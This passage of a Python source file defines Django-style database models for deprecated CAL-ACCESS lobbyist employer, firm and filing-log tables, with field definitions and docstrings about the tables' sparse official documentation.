verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER3_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployerFirms1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMPLOYER_FIRMS2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=95, end_page=96),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
termination_dt = fields.CharField(
verbose_name='termination date',
db_column='TERMINATION_DT',
max_length=32,
blank=True,
help_text="Termination effective date"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER_FIRMS1_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployerFirms2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMPLOYER_FIRMS1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=96),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
termination_dt = fields.CharField(
verbose_name='termination date',
db_column='TERMINATION_DT',
max_length=32,
blank=True,
help_text="Termination effective date"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER_FIRMS2_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployerHistoryCd(CalAccessBaseModel):
"""
Undocumented.
An empty file of the same name is included in the Secretary of State's daily CAL-ACCESS database exports.
This table is documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation
on these tables. Cox 5/11/2000".
Also, the columns on this table are identical to the columns on the
LOBBYIST_EMPLOYER1_CD, LOBBYIST_EMPLOYER2_CD and LOBBYIST_EMPLOYER3_CD
tables.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=96, end_page=97),
]
contributor_id = fields.IntegerField(
db_column="CONTRIBUTOR_ID",
help_text="Contributor identification number."
)
current_qtr_amt = fields.IntegerField(
db_column="CURRENT_QTR_AMT",
help_text="Current Quarter Amount"
)
employer_id = fields.IntegerField(
db_column="EMPLOYER_ID",
help_text="Employer identification number."
)
employer_name = fields.CharField(
db_column="EMPLOYER_NAME",
max_length=300,
blank=True,
help_text="Employer Name"
)
INTEREST_CD_CHOICES = (
(40301, 'AGRICULTURE'),
(40302, 'EDUCATION'),
(40303, 'ENTERTAINMENT/RECREATION'),
(40304, 'FINANCE/INSURANCE'),
(40305, 'GOVERNMENT'),
(40306, 'HEALTH'),
(40307, 'LABOR UNIONS'),
(40308, 'LEGAL'),
(40309, 'LODGING/RESTAURANTS'),
(40310, 'MANUFACTURING/INDUSTRIAL'),
(40311, 'MERCHANDISE/RETAIL'),
(40312, 'MISCELLANEOUS'),
(40313, 'OIL AND GAS'),
(40314, 'POLITICAL ORGANIZATIONS'),
(40315, 'PROFESSIONAL/TRADE'),
(40316, 'PUBLIC EMPLOYEES'),
(40317, 'REAL ESTATE'),
(40318, 'TRANSPORTATION'),
(40319, 'UTILITIES'),
)
interest_cd = fields.IntegerField(
db_column="INTEREST_CD",
choices=INTEREST_CD_CHOICES,
verbose_name='interest code',
help_text='Interest Code',
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=19),
],
)
interest_name = fields.CharField(
db_column="INTEREST_NAME",
max_length=300,
blank=True,
verbose_name="Interest name.",
help_text="Interest name.",
)
qtr_1 = fields.IntegerField(
db_column="QTR_1",
verbose_name="quarter 1 amount",
help_text="Quarter 1 total amount.",
)
qtr_2 = fields.IntegerField(
db_column="QTR_2",
verbose_name="quarter 2 amount.",
help_text="Quarter 2 total amount.",
)
qtr_3 = fields.IntegerField(
db_column="QTR_3",
verbose_name="quarter 3 amount",
help_text="Quarter 3 total amount.",
)
qtr_4 = fields.IntegerField(
db_column="QTR_4",
verbose_name="quarter 4 amount",
help_text="Quarter 4 total amount.",
)
qtr_5 = fields.IntegerField(
db_column="QTR_5",
verbose_name="quarter 5 amount5",
help_text="Quarter 5 total amount.",
)
qtr_6 = fields.IntegerField(
db_column="QTR_6",
verbose_name="quarter 6 amount.",
help_text="Quarter 6 total amount.",
)
qtr_7 = fields.IntegerField(
db_column="QTR_7",
verbose_name="quarter 7 amount.",
help_text="Quarter 7 total amount.",
)
qtr_8 = fields.IntegerField(
db_column="QTR_8",
verbose_name="quarter 8 amount.",
help_text="Quarter 8 total amount.",
)
session_id = fields.IntegerField(
db_column="SESSION_ID",
verbose_name="session identification number.",
help_text="Session identification number.",
)
session_total_amt = fields.IntegerField(
db_column="SESSION_TOTAL_AMT",
verbose_name="session total amount",
help_text="Total amount for the session.",
)
session_yr_1 = fields.IntegerField(
db_column="SESSION_YR_1",
verbose_name="session year 1",
help_text="Total amount for year 1 of the session.",
)
session_yr_2 = fields.IntegerField(
db_column="SESSION_YR_2",
verbose_name="session year 2",
help_text="Total amount for year 2 of the session.",
)
yr_1_ytd_amt = fields.IntegerField(
db_column="YR_1_YTD_AMT",
help_text="Year 1 year to date amount.",
)
yr_2_ytd_amt = fields.IntegerField(
db_column="YR_2_YTD_AMT",
help_text="Year 2 year to date amount.",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER_HISTORY_CD'
def __str__(self):
return str(self.contributor_id)
@python_2_unicode_compatible
class LobbyistFirm1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM2_CD and LOBBYIST_FIRM3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
"""
UNIQUE_KEY = False
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=103, end_page=104),
]
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM1_CD'
def __str__(self):
return str(self.firm_id)
@python_2_unicode_compatible
class LobbyistFirm2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM1_CD and LOBBYIST_FIRM3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=104),
]
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM2_CD'
def __str__(self):
return str(self.firm_id)
@python_2_unicode_compatible
class LobbyistFirm3Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM1_CD and LOBBYIST_FIRM2_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=105),
]
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM3_CD'
def __str__(self):
return str(self.firm_id)
@python_2_unicode_compatible
class LobbyistFirmEmployer1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_EMPLOYER2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also RPT_START and RPT_END each contain only one distinct value, "2001-04-01"
and "2001-06-30", respectively.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=100),
]
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
filing_id = fields.IntegerField(
db_column='FILING_ID',
db_index=True,
verbose_name='filing ID',
help_text="Unique filing identification number"
)
filing_sequence = fields.IntegerField(
db_column='FILING_SEQUENCE',
help_text="Amendment number. 0 is the original filing. \
1 to 999 are amendments"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
rpt_start = fields.DateField(
db_column='RPT_START',
null=True,
help_text="Starting date for the period the report covers"
)
rpt_end = fields.DateField(
db_column='RPT_END',
null=True,
help_text="Ending date for the period the report covers"
)
per_total = fields.FloatField(
db_column='PER_TOTAL',
help_text="Total this reporting period"
)
cum_total = fields.FloatField(
db_column='CUM_TOTAL',
help_text='Cumulative total to date'
)
lby_actvty = fields.CharField(
db_column='LBY_ACTVTY',
max_length=182,
blank=True,
help_text="Description of lobbying activity"
)
ext_lby_actvty = fields.CharField(
db_column='EXT_LBY_ACTVTY',
max_length=32,
blank=True,
help_text="This field is undocumented"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_EMPLOYER1_CD'
ordering = ("-rpt_start",)
def __str__(self):
return str(self.firm_id)
@python_2_unicode_compatible
class LobbyistFirmEmployer2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_EMPLOYER1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also RPT_START and RPT_END each contain only one distinct value, "2001-04-01"
and "2001-06-30", respectively.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11, end_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=100, end_page=101),
]
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
filing_id = fields.IntegerField(
db_column='FILING_ID',
db_index=True,
verbose_name='filing ID',
help_text="Unique filing identification number"
)
filing_sequence = fields.IntegerField(
db_column='FILING_SEQUENCE',
help_text="Amendment number. 0 is the original filing. \
1 to 999 are amendments"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
rpt_start = fields.DateField(
db_column='RPT_START',
null=True,
help_text="Starting date for the period the report covers"
)
rpt_end = fields.DateField(
db_column='RPT_END',
null=True,
help_text="Ending date for the period the report covers"
)
per_total = fields.FloatField(
db_column='PER_TOTAL',
help_text="Total this reporting period"
)
cum_total = fields.FloatField(
db_column='CUM_TOTAL',
help_text='Cumulative total to date'
)
lby_actvty = fields.CharField(
db_column='LBY_ACTVTY',
max_length=182,
blank=True,
help_text="Description of lobbying activity"
)
ext_lby_actvty = fields.CharField(
db_column='EXT_LBY_ACTVTY',
max_length=32,
blank=True,
help_text="This field is undocumented"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_EMPLOYER2_CD'
ordering = ("-rpt_start",)
def __str__(self):
return str(self.filing_id)
@python_2_unicode_compatible
class LobbyistFirmHistoryCd(CalAccessBaseModel):
"""
Undocumented.
An empty file of the same name is included in the Secretary of State's daily CAL-ACCESS database exports.
This table is documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation
on these tables. Cox 5/11/2000".
Also, the columns on this table are identical to the columns on the
LOBBYIST_FIRM1_CD, LOBBYIST_FIRM2_CD and LOBBYIST_FIRM3_CD tables.
"""
UNIQUE_KEY = (
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=101, end_page=102),
]
contributor_id = fields.IntegerField(
db_column="CONTRIBUTOR_ID",
help_text="Contributor identification number."
)
current_qtr_amt = fields.IntegerField(
db_column="CURRENT_QTR_AMT",
help_text="Current Quarter Amount"
)
firm_id = fields.IntegerField(
db_column="FIRM_ID",
help_text="Identification number of the Firm/Employer/Coalition."
)
firm_name = fields.CharField(
db_column="FIRM_NAME",
max_length=300,
help_text="Name of Firm/Employer/Coalition"
)
qtr_1 = fields.IntegerField(
db_column="QTR_1",
help_text="Quarter total amount."
)
qtr_2 = fields.IntegerField(
db_column="QTR_2",
help_text="Quarter total amount."
)
qtr_3 = fields.IntegerField(
db_column="QTR_3",
help_text="Quarter total amount."
)
qtr_4 = fields.IntegerField(
db_column="QTR_4",
help_text="Quarter total amount."
)
qtr_5 = fields.IntegerField(
db_column="QTR_5",
help_text="Quarter total amount."
)
qtr_6 = fields.IntegerField(
db_column="QTR_6",
help_text="Quarter total amount."
)
qtr_7 = fields.IntegerField(
db_column="QTR_7",
help_text="Quarter total amount."
)
qtr_8 = fields.IntegerField(
db_column="QTR_8",
help_text="Quarter total amount."
)
session_id = fields.IntegerField(
db_column="SESSION_ID",
help_text="Session identification number."
)
session_total_amt = fields.IntegerField(
db_column="SESSION_TOTAL_AMT",
help_text="Total amount for the session."
)
session_yr_1 = fields.IntegerField(
db_column="SESSION_YR_1",
help_text="Total amount for year 1 of the session."
)
session_yr_2 = fields.IntegerField(
db_column="SESSION_YR_2",
help_text="Total amount for year 2 of the session."
)
yr_1_ytd_amt = fields.IntegerField(
db_column="YR_1_YTD_AMT",
verbose_name="Year 1 year to date amount.",
help_text="Year 1 year to date amount.",
)
yr_2_ytd_amt = fields.IntegerField(
db_column="YR_2_YTD_AMT",
verbose_name="Year 2 year to date amount",
help_text="Year 2 year to date amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_HISTORY_CD'
def __str__(self):
return str(self.contributor_id)
@python_2_unicode_compatible
class LobbyistFirmLobbyist1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_LOBBYIST2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, all rows have the same SESSION_ID value: 2001.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=102),
]
lobbyist_id = fields.IntegerField(
db_column='LOBBYIST_ID',
verbose_name="Lobbyist ID",
help_text="Lobbyist identification number"
)
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
lobbyist_last_name = fields.CharField(
db_column='LOBBYIST_LAST_NAME',
max_length=15,
help_text="Lobbyist last name"
)
lobbyist_first_name = fields.CharField(
db_column='LOBBYIST_FIRST_NAME',
max_length=17,
help_text="Lobbyist first name"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_LOBBYIST1_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.lobbyist_id)
@python_2_unicode_compatible
class LobbyistFirmLobbyist2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_LOBBYIST1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, all rows have the same SESSION_ID value: 2001.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=102, end_page=103),
]
lobbyist_id = fields.IntegerField(
db_column='LOBBYIST_ID',
verbose_name="Lobbyist ID",
help_text="Lobbyist identification number"
)
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
lobbyist_last_name = fields.CharField(
db_column='LOBBYIST_LAST_NAME',
max_length=15,
help_text="Lobbyist last name"
)
lobbyist_first_name = fields.CharField(
db_column='LOBBYIST_FIRST_NAME',
max_length=17,
help_text="Lobbyist first name"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_LOBBYIST2_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.lobbyist_id)
@python_2_unicode_compatible
class EfsFilingLogCd(CalAccessBaseModel):
"""
Logs from the Electronic Filing Subsystem, which accepts and validates electronic filings.
"""
UNIQUE_KEY = (
"FILING_DATE",
"VENDOR"
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711624-Overview', start_page=1, end_page=2),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=49, end_page=50),
]
FILING_FORMS = [
annotations.get_form('F400'),
annotations.get_form('F401'),
annotations.get_form('F402'),
annotations.get_form('F410'),
annotations.get_form('F425'),
annotations.get_form('F450'),
annotations.get_form('F460'),
annotations.get_form('F461'),
annotations.get_form('F465'),
annotations.get_form('F496'),
annotations.get_form('F497'),
annotations.get_form('F498'),
annotations.get_form('F601'),
annotations.get_form('F602'),
annotations.get_form('F603'),
annotations.get_form('F604'),
annotations.get_form('F606'),
annotations.get_form('F607'),
annotations.get_form('F615'),
annotations.get_form('F625'),
annotations.get_form('F635'),
annotations.get_form('F645'),
]
filing_date = fields.DateField(
db_column='FILING_DATE',
null=True,
help_text="Date of filing"
)
filingstatus = fields.IntegerField(
db_column='FILINGSTATUS',
help_text="Status of filing. This field is described in the docs as being\
VARCHAR. However, its distinct values are 0, 1, 2 and 7.",
)
vendor = fields.CharField(
db_column='VENDOR',
max_length=250,
help_text="Software vendor who submitted the electronic filing"
)
filer_id = fields.CharField(
verbose_name='filer ID',
db_column='FILER_ID',
max_length=250,
blank=True,
db_index=True,
help_text="Filer's unique identification number",
)
FORM_TYPE_CHOICES = tuple([(f.db_value, f.full_title) for f in FILING_FORMS]) + (
('BADFORMAT 253', 'Unknown'),
('form', 'Unknown'),
)
form_type = fields.CharField(
db_column='FORM_TYPE',
max_length=250,
help_text='Name of the source filing form or schedule',
db_index=True,
choices=FORM_TYPE_CHOICES,
verbose_name="form type",
documentcloud_pages=[
DocumentCloud(id='2711624-Overview', start_page=4, end_page=8),
]
)
error_no = fields.CharField(
db_column='ERROR_NO',
max_length=250,
help_text='Most records have a value of "ACCEPTED". Other records include "ERROR"\
or "BADFORMAT" and a three-digit number.',
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'EFS_FILING_LOG_CD'
ordering = ("-filing_date",)
def __str__(self):
return "{} ({})".format(self.vendor, self.filing_date)
| calaccess_raw/models/inactive.py | 75,087 | Ballot-measure dates and times.
The cover page for officeholder and candidate short and supplemental forms.
Logs from the Electronic Filing Subsystem, which accepts and validates electronic filings.
Undocumented.
The table's official description contains this note: "J M needs to document. This is
in his list of tables designed for future enhancements."
Deprecated table for the disclosure of campaign contributions made by lobbyists.
